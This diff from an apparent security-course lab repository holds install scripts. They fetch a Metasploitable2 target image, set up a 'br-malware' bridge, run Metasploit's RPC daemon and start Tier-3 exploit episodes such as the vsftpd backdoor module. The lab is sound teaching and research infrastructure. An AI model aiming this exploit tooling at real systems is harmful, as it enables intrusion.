IMAGE_SHA256="${IMAGE_SHA256:-}"
|
||||
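# Build the default path without cd: under `set -e` a failing cd inside
# the command substitution would abort silently before mkdir -p runs.
OUT_DIR="${OUT_DIR:-$(dirname "$0")/../vm/images}"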
|
||||
WORK_DIR="${WORK_DIR:-/tmp/cis490-metasploitable-fetch}"
|
||||
|
||||
log() { printf '[fetch-metasploitable2] %s\n' "$*" >&2; }
|
||||
die() { log "FATAL: $*"; exit 1; }
|
||||
|
||||
[[ -n "$IMAGE_URL" ]] || die "set IMAGE_URL to the Metasploitable2 download URL"
|
||||
[[ -n "$IMAGE_SHA256" ]] || die "set IMAGE_SHA256 to the expected sha256 of the archive"
|
||||
|
||||
mkdir -p "$OUT_DIR" "$WORK_DIR"
|
||||
|
||||
ARCHIVE="$WORK_DIR/$(basename "$IMAGE_URL")"
|
||||
log "downloading $IMAGE_URL → $ARCHIVE"
|
||||
if [[ -f "$ARCHIVE" ]]; then
|
||||
log "archive already present; skipping download"
|
||||
else
|
||||
curl -fL --retry 3 --retry-delay 5 -o "$ARCHIVE.partial" "$IMAGE_URL"
|
||||
mv "$ARCHIVE.partial" "$ARCHIVE"
|
||||
fi
|
||||
|
||||
log "verifying sha256"
|
||||
ACTUAL="$(sha256sum "$ARCHIVE" | awk '{print $1}')"
|
||||
if [[ "$ACTUAL" != "$IMAGE_SHA256" ]]; then
|
||||
die "sha256 mismatch: expected $IMAGE_SHA256, got $ACTUAL"
|
||||
fi
|
||||
log "sha256 ok"
|
||||
|
||||
# Extract — handle either zip or 7z, since various mirrors choose one
|
||||
# or the other.
|
||||
case "$ARCHIVE" in
|
||||
*.zip) ( cd "$WORK_DIR" && unzip -o "$ARCHIVE" ) ;;
|
||||
*.7z|*.7zip) command -v 7z >/dev/null || die "7z not installed"; \
|
||||
( cd "$WORK_DIR" && 7z x -y "$ARCHIVE" ) ;;
|
||||
*) die "unsupported archive type: $ARCHIVE" ;;
|
||||
esac
|
||||
|
||||
VMDK="$(find "$WORK_DIR" -name 'Metasploitable*.vmdk' -print -quit)"
|
||||
[[ -n "$VMDK" ]] || die "no Metasploitable*.vmdk in extracted archive"
|
||||
|
||||
log "converting $VMDK → qcow2"
|
||||
command -v qemu-img >/dev/null || die "qemu-img required (apt install qemu-utils)"
|
||||
qemu-img convert -O qcow2 "$VMDK" "$OUT_DIR/metasploitable2.qcow2"
|
||||
|
||||
log "done: $OUT_DIR/metasploitable2.qcow2"
|
||||
log "Tier-3 ready when msfrpcd is up. See scripts/install-msfrpcd.sh."
|
||||
234
scripts/install-lab-host.sh
Executable file
|
|
@ -0,0 +1,234 @@
|
|||
#!/usr/bin/env bash
|
||||
# Install / refresh the CIS490 lab-host role.
|
||||
#
|
||||
# Idempotent — safe to re-run after `git pull`. Does NOT enroll the
|
||||
# host into WireGuard (that's wg-enroll's job, run separately and
|
||||
# *first*) and does NOT mint TLS certs (that's wg-pki's job).
|
||||
#
|
||||
# Steps:
|
||||
# 1. Verify prereqs (KVM, zstd, qemu, python3.11+, systemd).
|
||||
# 2. Create the cis490 service user + /var/lib/cis490 layout.
|
||||
# 3. Sync the repo into /opt/cis490 and build a uv-managed venv.
|
||||
# 4. Install systemd units from etc/.
|
||||
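# 5. Drop /etc/cis490/lab-host.toml (only on first install).
# 6. Write /etc/cis490/lab-host.env and provision br-malware + tap pool.
# 7. Auto-fetch the mTLS leaf cert from bootstrap.wg (if host_id is set).
# 8. Fetch the Alpine baseline image and build cidata.iso (best-effort).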
|
||||
#
|
||||
# Operator finishes by:
|
||||
# - editing /etc/cis490/lab-host.toml (host_id, receiver URL, certs)
|
||||
# - placing leaf certs at /etc/cis490/certs/{lab-host.pem,key,wg-ca.pem}
|
||||
# - `systemctl enable --now cis490-shipper`
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
|
||||
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
|
||||
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
|
||||
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
|
||||
SERVICE_USER="${SERVICE_USER:-cis490}"
|
||||
|
||||
log() { printf '[install-lab-host] %s\n' "$*" >&2; }
|
||||
die() { log "FATAL: $*"; exit 1; }
|
||||
|
||||
# --- 1. prereqs --------------------------------------------------------
|
||||
log "checking prereqs"
|
||||
|
||||
if [[ $EUID -ne 0 ]]; then
|
||||
die "must run as root (writes to /opt, /etc, /var/lib, and systemd)"
|
||||
fi
|
||||
command -v systemctl >/dev/null || die "systemd not found"
|
||||
command -v qemu-system-x86_64 >/dev/null || die "qemu-system-x86_64 not on PATH"
|
||||
command -v zstd >/dev/null || die "zstd not on PATH (apt install zstd)"
|
||||
[[ -e /dev/kvm ]] || die "/dev/kvm missing — KVM not available"
|
||||
|
||||
# uv is preferred (lockfile-driven). Fall back to system pip if absent.
|
||||
USE_UV=0
|
||||
if command -v uv >/dev/null; then USE_UV=1; fi
|
||||
|
||||
# --- 2. user + layout --------------------------------------------------
|
||||
log "ensuring service user $SERVICE_USER"
|
||||
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
|
||||
useradd --system --no-create-home --shell /usr/sbin/nologin \
|
||||
--home-dir "$INSTALL_ROOT" "$SERVICE_USER"
|
||||
fi
|
||||
# kvm group lets the service spawn VMs.
|
||||
if getent group kvm >/dev/null 2>&1; then
|
||||
usermod -a -G kvm "$SERVICE_USER" || true
|
||||
fi
|
||||
|
||||
install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
|
||||
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
|
||||
"$DATA_ROOT" "$DATA_ROOT/data" \
|
||||
"$DATA_ROOT/data/episodes" "$DATA_ROOT/data/outbox" \
|
||||
"$DATA_ROOT/data/shipped" "$DATA_ROOT/data/queue" \
|
||||
"$DATA_ROOT/samples" "$DATA_ROOT/samples/store" \
|
||||
"$DATA_ROOT/vm" "$DATA_ROOT/vm/images"
|
||||
|
||||
# --- 3. repo + venv ----------------------------------------------------
|
||||
log "syncing repo into $INSTALL_ROOT"
|
||||
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
|
||||
# We use a clean cp -aT rather than rsync to avoid an extra dep.
|
||||
cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
|
||||
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
|
||||
|
||||
log "building venv"
|
||||
if [[ "$USE_UV" -eq 1 ]]; then
|
||||
sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
|
||||
uv sync --project "$INSTALL_ROOT"
|
||||
else
|
||||
sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
|
||||
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
|
||||
--quiet --upgrade pip
|
||||
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
|
||||
--quiet starlette 'uvicorn[standard]' httpx msgpack
|
||||
fi
|
||||
|
||||
# --- 4. systemd --------------------------------------------------------
|
||||
log "installing systemd units"
|
||||
install -m 0644 "$REPO_ROOT/etc/cis490-shipper.service" \
|
||||
/etc/systemd/system/cis490-shipper.service
|
||||
install -m 0644 "$REPO_ROOT/etc/cis490-orchestrator.service" \
|
||||
/etc/systemd/system/cis490-orchestrator.service
|
||||
systemctl daemon-reload
|
||||
|
||||
# --- 5. config template (only on first install) -----------------------
|
||||
if [[ ! -f "$ETC_ROOT/lab-host.toml" ]]; then
|
||||
log "writing $ETC_ROOT/lab-host.toml (template)"
|
||||
install -m 0640 -o root -g "$SERVICE_USER" \
|
||||
"$REPO_ROOT/etc/lab-host.toml.example" "$ETC_ROOT/lab-host.toml"
|
||||
NEW_INSTALL=1
|
||||
else
|
||||
log "$ETC_ROOT/lab-host.toml exists; leaving in place"
|
||||
NEW_INSTALL=0
|
||||
fi
|
||||
|
||||
# --- 6. orchestrator env file (read by cis490-orchestrator.service) ----
|
||||
ENV_FILE="$ETC_ROOT/lab-host.env"
|
||||
DEFAULT_HOST_ID="$(hostname -s)"
|
||||
if [[ ! -f "$ENV_FILE" ]]; then
|
||||
log "writing $ENV_FILE (host_id defaults to $DEFAULT_HOST_ID — edit if you want something else)"
|
||||
install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
|
||||
# Read by cis490-orchestrator.service. Override per-host as needed.
|
||||
FLEET_HOST_ID=$DEFAULT_HOST_ID
|
||||
# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
|
||||
# Tier-3 modules whose payloads need callback (reverse/bind shells).
|
||||
# install-lab-host.sh provisions the bridge + tap pool below; leave
|
||||
# this on unless your lab host can't run NETLINK ops.
|
||||
BRIDGE=br-malware
|
||||
EOF
|
||||
fi
|
||||
|
||||
# --- 6b. host-only bridge + per-slot tap pool --------------------------
|
||||
# br-malware lets pcap capture the guest traffic and lets bind/reverse
|
||||
# shell payloads route between guest and host. We pre-create a small
|
||||
# pool of taps so the launchers don't need sudo to attach interfaces;
|
||||
# each slot N (0..7) gets cis490tapN (Tier-2 demo) and cis490targetN
# (Tier-3 target). Idempotent: re-running on an already-set-up host is a
# no-op.
|
||||
if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
|
||||
if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
|
||||
log "bridge br-malware ready"
|
||||
for n in 0 1 2 3 4 5 6 7; do
|
||||
for prefix in cis490tap cis490target; do
|
||||
tap="${prefix}${n}"
|
||||
if ! ip link show "$tap" >/dev/null 2>&1; then
|
||||
ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
|
||||
ip tuntap add dev "$tap" mode tap 2>/dev/null || true
|
||||
ip link set "$tap" master br-malware 2>/dev/null || true
|
||||
ip link set "$tap" up 2>/dev/null || true
|
||||
fi
|
||||
done
|
||||
done
|
||||
log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
|
||||
else
|
||||
log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
|
||||
# Comment out BRIDGE in the env file — fleet will still run
|
||||
# Tier-2 + non-callback Tier-3 modules.
|
||||
sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware # auto-disabled: bridge setup failed/' "$ENV_FILE"
|
||||
fi
|
||||
fi
|
||||
|
||||
# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
|
||||
# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
|
||||
# already on disk. Trust boundary: "reached bootstrap.wg over WG"
|
||||
# (iptmonads already filters non-peers from 443). Caddy's TLS cert
|
||||
# is verified against the bundled etc/caddy-root.crt — no chicken-
|
||||
# and-egg.
|
||||
HOST_ID="$(grep -E '^host_id\s*=' "$ETC_ROOT/lab-host.toml" 2>/dev/null \
|
||||
| head -1 | sed -E 's/^host_id\s*=\s*"([^"]+)".*/\1/')"
|
||||
if [[ -z "$HOST_ID" || "$HOST_ID" == "REPLACE_ME" ]]; then
|
||||
log "skipping cert auto-fetch: host_id not set in $ETC_ROOT/lab-host.toml"
|
||||
elif [[ ! -f "$ETC_ROOT/certs/lab-host.pem" ]]; then
|
||||
log "fetching leaf cert from https://bootstrap.wg/v1/cert/$HOST_ID"
|
||||
install -d -m 0755 -o root -g "$SERVICE_USER" "$ETC_ROOT/certs"
|
||||
TAR="/tmp/cis490-bootstrap-$$.tar"
|
||||
if curl -fsS --cacert "$REPO_ROOT/etc/caddy-root.crt" \
|
||||
--connect-timeout 10 --max-time 60 \
|
||||
"https://bootstrap.wg/v1/cert/$HOST_ID" -o "$TAR"; then
|
||||
tar -C "$ETC_ROOT/certs" -xf "$TAR"
|
||||
        mv "$ETC_ROOT/certs/ca.crt" "$ETC_ROOT/certs/wg-ca.pem"
        mv "$ETC_ROOT/certs/$HOST_ID.pem" "$ETC_ROOT/certs/lab-host.pem"
        mv "$ETC_ROOT/certs/$HOST_ID.key" "$ETC_ROOT/certs/lab-host.key"
        chown root:"$SERVICE_USER" "$ETC_ROOT/certs/"*.pem \
            "$ETC_ROOT/certs/lab-host.key"
        chmod 0644 "$ETC_ROOT/certs/"*.pem
        chmod 0640 "$ETC_ROOT/certs/lab-host.key"
        rm -f "$TAR"
        log "leaf cert installed for host_id=$HOST_ID"
    else
        rm -f "$TAR"
        log "WARN: bootstrap.wg fetch failed — make sure /etc/hosts maps it"
        log " to 10.100.0.1 and that wg0 is up. cert delivery skipped."
    fi
else
    log "$ETC_ROOT/certs/lab-host.pem present; skipping auto-fetch"
fi

# --- 8. baseline VM image + cidata (best-effort) -----------------------
ALPINE_IMG="$DATA_ROOT/vm/images/alpine-baseline.qcow2"
CIDATA_ISO="$DATA_ROOT/vm/images/cidata.iso"
if [[ ! -f "$ALPINE_IMG" ]]; then
    if "$REPO_ROOT/scripts/fetch-alpine-baseline.sh" "$ALPINE_IMG"; then
        log "fetched Alpine baseline -> $ALPINE_IMG"
    else
        log "WARN: Alpine baseline fetch failed; drop a qcow2 at $ALPINE_IMG manually"
    fi
fi
if [[ -f "$ALPINE_IMG" && ! -f "$CIDATA_ISO" ]]; then
    log "building cidata.iso (in-guest agent embedded)"
    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/python" \
        "$INSTALL_ROOT/tools/build_cidata.py" "$CIDATA_ISO" || \
        log "WARN: cidata build failed; run tools/build_cidata.py manually"
fi
# Symlink the canonical paths the launchers look at, when missing.
ln -sf "$ALPINE_IMG" "$INSTALL_ROOT/vm/images/alpine-baseline.qcow2" 2>/dev/null || true
ln -sf "$CIDATA_ISO" "$INSTALL_ROOT/vm/images/cidata.iso" 2>/dev/null || true

if [[ "$NEW_INSTALL" == "1" ]]; then
    log ""
    log "================================================================="
    log " FIRST-INSTALL NEXT STEPS "
    log "================================================================="
    log " 1. Edit $ETC_ROOT/lab-host.toml — set host_id and receiver URL."
    log ""
    log " 2. (On the Pi.) Mint + ship a leaf cert for this host:"
    log " sudo wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>"
    log ""
    log " 3. Run the diagnostic — every red row prints the exact fix:"
    log " $INSTALL_ROOT/.venv/bin/python \\"
    log " $INSTALL_ROOT/tools/cis490_doctor.py --role lab-host"
    log ""
    log " 4. Smoke-test the pipe (returns ok=true on success):"
    log " sudo -u $SERVICE_USER $INSTALL_ROOT/.venv/bin/python -m shipper \\"
    log " --config $ETC_ROOT/lab-host.toml --ping"
    log ""
    log " 5. Turn on the services — episodes start flowing immediately:"
    log " sudo systemctl enable --now cis490-shipper cis490-orchestrator"
    log "================================================================="
fi

log "lab-host install complete."
log ""
log "Cloning this repo and running the launchers manually is NOT enough."
log "The lab-host role's data flow lives in the systemd services this"
log "script just installed. If index.jsonl in the receiver's data root"
log "on the Pi stays empty after step 5, run:"
log " $INSTALL_ROOT/.venv/bin/python $INSTALL_ROOT/tools/cis490_doctor.py"
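
The cert-install step in install-lab-host.sh leaves the CA and leaf certificates at mode 0644 and the private key at 0640 (root plus the service group). One way to confirm that from Python is sketched below. `file_mode` and `key_is_private` are hypothetical helpers, not part of this repo, and the demo runs against a temporary file rather than the real key path.

```python
import os
import stat
import tempfile


def file_mode(path: str) -> int:
    """Return only the permission bits of a file, e.g. 0o640."""
    return stat.S_IMODE(os.stat(path).st_mode)


def key_is_private(path: str) -> bool:
    """True when 'other' users have no access at all to the file."""
    return file_mode(path) & 0o007 == 0


# Demo on a throwaway file standing in for lab-host.key (assumption:
# a POSIX filesystem where chmod is honoured).
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    demo_path = tmp.name
os.chmod(demo_path, 0o640)
mode_ok = key_is_private(demo_path)   # key-style permissions
os.chmod(demo_path, 0o644)
mode_bad = key_is_private(demo_path)  # cert-style permissions
os.unlink(demo_path)
print(mode_ok, mode_bad)
```

A check like this only inspects permission bits; ownership (root and the service group) would need a separate `os.stat` comparison.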
124
scripts/install-msfrpcd.sh
Executable file
@@ -0,0 +1,124 @@
#!/usr/bin/env bash
# Install + configure ``msfrpcd`` for the Tier-3 exploit driver.
#
# Idempotent: re-running on a host that already has msfrpcd refreshes
# the systemd unit, keeps the existing password, and skips the reinstall.
#
# Steps:
#   1. Install metasploit-framework via the host package manager (or
#      report the right one-liner for that distro). Big download —
#      ~1 GiB and several minutes.
#   2. Generate a strong password and store at /etc/cis490/msfrpc.env
#      (mode 0640, owner root:cis490).
#   3. Drop /etc/systemd/system/cis490-msfrpcd.service that runs
#      msfrpcd bound to 127.0.0.1:55553 with the generated password.
#   4. Enable + start.
#
# After this runs, ``MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env;
# echo $MSFRPC_PASSWORD)`` makes tools/run_tier3_demo.py work zero-touch.

set -euo pipefail

ETC_ROOT="/etc/cis490"
ENV_FILE="$ETC_ROOT/msfrpc.env"
UNIT="/etc/systemd/system/cis490-msfrpcd.service"
PORT="${MSFRPC_PORT:-55553}"
USER_NAME="${MSFRPC_USER:-msf}"

log() { printf '[install-msfrpcd] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }

[[ $EUID -eq 0 ]] || die "must run as root"
command -v systemctl >/dev/null || die "systemd not found"

# --- 1. install metasploit-framework -----------------------------------
if ! command -v msfrpcd >/dev/null; then
    log "msfrpcd not found; installing metasploit-framework"
    if command -v apt-get >/dev/null; then
        # The Debian/Ubuntu metasploit-framework package isn't in
        # the default repos for most distros. Use Rapid7's official
        # nightly installer when available.
        if [[ ! -x /opt/metasploit-framework/bin/msfrpcd ]]; then
            log "fetching Rapid7 nightly installer"
            curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
                -o /tmp/msfinstall.sh || true
            log "automated install not available — install manually:"
            log " https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html"
            die "rerun once msfrpcd is on PATH"
        fi
        # Symlink the wrapper so ``msfrpcd`` is on PATH.
        ln -sf /opt/metasploit-framework/bin/msfrpcd /usr/local/bin/msfrpcd
    elif command -v pacman >/dev/null; then
        log "pacman -S metasploit"
        pacman -Sy --noconfirm metasploit
    elif command -v dnf >/dev/null; then
        die "Fedora/RHEL: install metasploit-framework manually, then re-run"
    else
        die "unknown package manager — install metasploit-framework manually"
    fi
fi

command -v msfrpcd >/dev/null || die "msfrpcd still missing after install attempt"

# --- 2. generate password ----------------------------------------------
install -d -m 0755 -o root -g root "$ETC_ROOT"
if ! id -u cis490 >/dev/null 2>&1; then
    useradd --system --no-create-home --shell /usr/sbin/nologin cis490
fi
if [[ ! -f "$ENV_FILE" ]]; then
    log "generating msfrpc password"
    PW="$(openssl rand -base64 24 | tr -d '/+=' | head -c 32)"
    install -m 0640 -o root -g cis490 /dev/stdin "$ENV_FILE" <<EOF
# Auto-generated by install-msfrpcd.sh — do not edit.
MSFRPC_HOST=127.0.0.1
MSFRPC_PORT=$PORT
MSFRPC_USER=$USER_NAME
MSFRPC_PASSWORD=$PW
EOF
else
    log "$ENV_FILE exists; preserving existing password"
fi

# --- 3. systemd unit ----------------------------------------------------
log "installing systemd unit"
cat > "$UNIT" <<EOF
[Unit]
Description=CIS490 — Metasploit RPC daemon (loopback only)
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
EnvironmentFile=$ENV_FILE
# msfrpcd flags:
#   -P <pw>    password
#   -U <user>  username
#   -a <ip>    bind address (loopback only — Tier-3 driver runs locally)
#   -p <port>  port
#   -f         foreground (no daemonization, so systemd manages PID)
ExecStart=/usr/bin/env msfrpcd -P \${MSFRPC_PASSWORD} -U \${MSFRPC_USER} -a 127.0.0.1 -p \${MSFRPC_PORT} -f
Restart=on-failure
RestartSec=5
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=full
ProtectHome=true

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable --now cis490-msfrpcd

# --- 4. final smoke -----------------------------------------------------
sleep 2
if ! ss -ltn 2>/dev/null | grep -q ":$PORT"; then
    log "WARN: nothing listening on 127.0.0.1:$PORT yet — check"
    log " journalctl -u cis490-msfrpcd"
fi

log "done. To run a Tier-3 episode:"
log " set -a; . $ENV_FILE; set +a"
log " python tools/run_tier3_demo.py --module vsftpd_234_backdoor"
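
The env file written in step 2 of install-msfrpcd.sh is plain KEY=VALUE text, so a Python client could read it without sourcing it through a shell. The sketch below is one way to do that, assuming only the four keys the script writes. `parse_env_text` is a hypothetical helper (not part of this repo), and the sample password is a placeholder.

```python
def parse_env_text(text: str) -> dict[str, str]:
    """Parse simple KEY=VALUE lines; skip blank lines and '#' comments."""
    env: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:  # ignore lines that carry no '=' at all
            env[key.strip()] = value.strip()
    return env


# Sample content shaped like /etc/cis490/msfrpc.env (placeholder secret).
SAMPLE = """\
# Auto-generated by install-msfrpcd.sh
MSFRPC_HOST=127.0.0.1
MSFRPC_PORT=55553
MSFRPC_USER=msf
MSFRPC_PASSWORD=example-not-a-real-secret
"""

env = parse_env_text(SAMPLE)
print(env["MSFRPC_HOST"], int(env["MSFRPC_PORT"]))
```

This deliberately handles no quoting or variable expansion, which matches the unquoted values the installer emits; a file edited by hand with quotes would need a fuller parser.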
112
scripts/install-receiver.sh
Executable file
@@ -0,0 +1,112 @@
#!/usr/bin/env bash
# Install / refresh the CIS490 receiver role on the central WG node
# (the Pi5 in our setup). Idempotent — safe to re-run.
#
# Steps:
#   1. Verify prereqs (python3.11+, systemd).
#   2. Create the cis490 service user + /var/lib/cis490 layout.
#   3. Sync the repo into /opt/cis490 and build a venv.
#   4. Install cis490-receiver.service and cis490-bootstrap.service.
#   5. Drop /etc/cis490/receiver.toml on first install.
#
# This script does NOT:
#   - configure Caddy. Add a `collector.wg` block to your spectral/caddy
#     config to terminate TLS and reverse-proxy to 127.0.0.1:8443.
#   - issue server / client certs. wg-pki owns CA + leaf issuance.
#   - open firewall ports. iptmonads owns the WG-side ruleset.

set -euo pipefail

REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
SERVICE_USER="${SERVICE_USER:-cis490}"

log() { printf '[install-receiver] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }

# --- 1. prereqs --------------------------------------------------------
log "checking prereqs"
if [[ $EUID -ne 0 ]]; then
    die "must run as root"
fi
command -v systemctl >/dev/null || die "systemd not found"
command -v python3 >/dev/null || die "python3 not on PATH"

PY_VER="$(python3 -c 'import sys; print(f"{sys.version_info.major}.{sys.version_info.minor}")')"
if ! python3 -c 'import sys; sys.exit(0 if sys.version_info >= (3,11) else 1)'; then
    die "python >=3.11 required, found $PY_VER"
fi

USE_UV=0
if command -v uv >/dev/null; then USE_UV=1; fi

# --- 2. user + layout --------------------------------------------------
log "ensuring service user $SERVICE_USER"
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
    useradd --system --no-create-home --shell /usr/sbin/nologin \
        --home-dir "$INSTALL_ROOT" "$SERVICE_USER"
fi

install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
    "$DATA_ROOT" "$DATA_ROOT/episodes" "$DATA_ROOT/incoming"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0750 "$DATA_ROOT"
# Pre-create the index file so the first PUT doesn't race on creation.
sudo -u "$SERVICE_USER" -- touch "$DATA_ROOT/index.jsonl"

# --- 3. repo + venv ----------------------------------------------------
log "syncing repo into $INSTALL_ROOT"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"

log "building venv"
if [[ "$USE_UV" -eq 1 ]]; then
    sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
        uv sync --project "$INSTALL_ROOT"
else
    sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
        --quiet --upgrade pip
    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
        --quiet starlette 'uvicorn[standard]'
fi

# --- 4. systemd --------------------------------------------------------
log "installing systemd units (receiver + bootstrap)"
install -m 0644 "$REPO_ROOT/etc/cis490-receiver.service" \
    /etc/systemd/system/cis490-receiver.service
install -m 0644 "$REPO_ROOT/etc/cis490-bootstrap.service" \
    /etc/systemd/system/cis490-bootstrap.service
systemctl daemon-reload

# --- 5. config template (only on first install) -----------------------
if [[ ! -f "$ETC_ROOT/receiver.toml" ]]; then
    log "writing $ETC_ROOT/receiver.toml (template)"
    install -m 0640 -o root -g "$SERVICE_USER" \
        "$REPO_ROOT/etc/receiver.toml.example" "$ETC_ROOT/receiver.toml"
    log ""
    log "FIRST-INSTALL NEXT STEPS:"
    log " 1. Verify $ETC_ROOT/receiver.toml paths."
    log " 2. Add a collector.wg block to your spectral/caddy config."
    log " Example:"
    log " collector.wg {"
    log " tls internal"
    log " reverse_proxy 127.0.0.1:8443"
    log " }"
    log " (mTLS to clients is enforced by the wg-pki CA bundle on"
    log " the receiver side once leaf certs are issued.)"
    log " 3. Open the WG-side port via iptmonads."
    log " 4. systemctl enable --now cis490-receiver cis490-bootstrap"
    log " 5. From a lab host: cis490-shipper --ping"
    log ""
    log "Bootstrap endpoint (cis490-bootstrap on :8446 + Caddy bootstrap.wg)"
    log "lets enrolled lab hosts auto-fetch their leaf certs. Without it,"
    log "operators have to hand-carry tarballs via deploy-cis490-cert.sh."
else
    log "$ETC_ROOT/receiver.toml exists; leaving in place"
fi

log "receiver install complete."
50
scripts/issue-cis490-client-cert-wrapper.sh
Executable file
@@ -0,0 +1,50 @@
#!/usr/bin/env bash
# Wrapper that re-points the wg-pki issuer script's relative-path
# assumption (PWD-derived publish dir, $REPO_ROOT/issued/) to the
# absolute /var/lib/wg-pki/issued/ that the bootstrap service uses.
#
# wg-pki ships the actual issuer at
# /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh, which
# computes paths relative to its own location. This wrapper sets
# WG_PKI_STATE so the CA key is found in /var/lib/wg-pki, and forces
# --out-dir to a path under /var/lib so cis490-bootstrap (with
# ProtectHome=tmpfs) can write the resulting tarballs.

set -euo pipefail

# Resolve issuer path: prefer the install-time copy at /opt/wg-pki/,
# fall back to whatever wg-pki clone the operator has under /home.
ISSUER="${WG_PKI_ISSUER:-}"
if [[ -z "$ISSUER" ]]; then
    for cand in \
        /opt/wg-pki/scripts/issue-cis490-client-cert.sh \
        /home/max/wg-pki/scripts/issue-cis490-client-cert.sh \
        /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh; do
        if [[ -x "$cand" ]]; then ISSUER="$cand"; break; fi
    done
fi
if [[ -z "$ISSUER" || ! -x "$ISSUER" ]]; then
    echo "wrapper: no issue-cis490-client-cert.sh found; tried /opt/wg-pki, /home/max/wg-pki, /home/max/.env/wg-pki" >&2
    exit 2
fi
OUT_ROOT="/var/lib/wg-pki/issued"

if [[ $# -lt 1 ]]; then
    echo "usage: $0 <host_id> [--out-dir DIR] [--days N]" >&2
    exit 2
fi

HOST_ID="$1"; shift

# Pull off any --out-dir already passed; we override.
EXTRA=()
while [[ $# -gt 0 ]]; do
    case "$1" in
        --out-dir) shift 2 ;; # drop, we set it ourselves
        *) EXTRA+=("$1"); shift ;;
    esac
done

mkdir -p "$OUT_ROOT/$HOST_ID"
exec env WG_PKI_STATE=/var/lib/wg-pki \
    "$ISSUER" "$HOST_ID" --out-dir "$OUT_ROOT/$HOST_ID" ${EXTRA[@]+"${EXTRA[@]}"}
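
The wrapper's argument loop drops any caller-supplied `--out-dir DIR` pair and passes everything else through unchanged. The same filtering is sketched in Python below, purely as an illustration of the intended behaviour. `drop_out_dir` is a hypothetical name, and `lab-01` is a placeholder host id.

```python
def drop_out_dir(args: list[str]) -> list[str]:
    """Return args with every `--out-dir VALUE` pair removed."""
    kept: list[str] = []
    i = 0
    while i < len(args):
        if args[i] == "--out-dir":
            i += 2  # skip the flag and the value that follows it
        else:
            kept.append(args[i])
            i += 1
    return kept


# The wrapper then appends its own --out-dir under /var/lib/wg-pki/issued.
host_id = "lab-01"  # placeholder
extra = drop_out_dir(["--out-dir", "/tmp/x", "--days", "30"])
command = [host_id, "--out-dir", f"/var/lib/wg-pki/issued/{host_id}", *extra]
print(command)
```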
0
shipper/__init__.py
Normal file
106
shipper/__main__.py
Normal file
@@ -0,0 +1,106 @@
"""``cis490-shipper`` CLI entrypoint.

Modes:

  --ping     hit /v1/ping; exit 0 if 200/ok, non-zero otherwise.
             No tarball flow; index.jsonl on the receiver is untouched.
  --once     one scan pass over data/episodes/, ship anything done, exit.
  (default)  long-running daemon; rescans every scan_interval_s.
"""

from __future__ import annotations

import argparse
import json
import logging
import signal
import sys
from pathlib import Path

from .config import ShipperConfig
from .queue import ShipperQueue
from .transport import ShipperTransport


def _setup_logging(level: str) -> None:
    logging.basicConfig(
        level=getattr(logging, level.upper(), logging.INFO),
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
    )


def main(argv: list[str] | None = None) -> int:
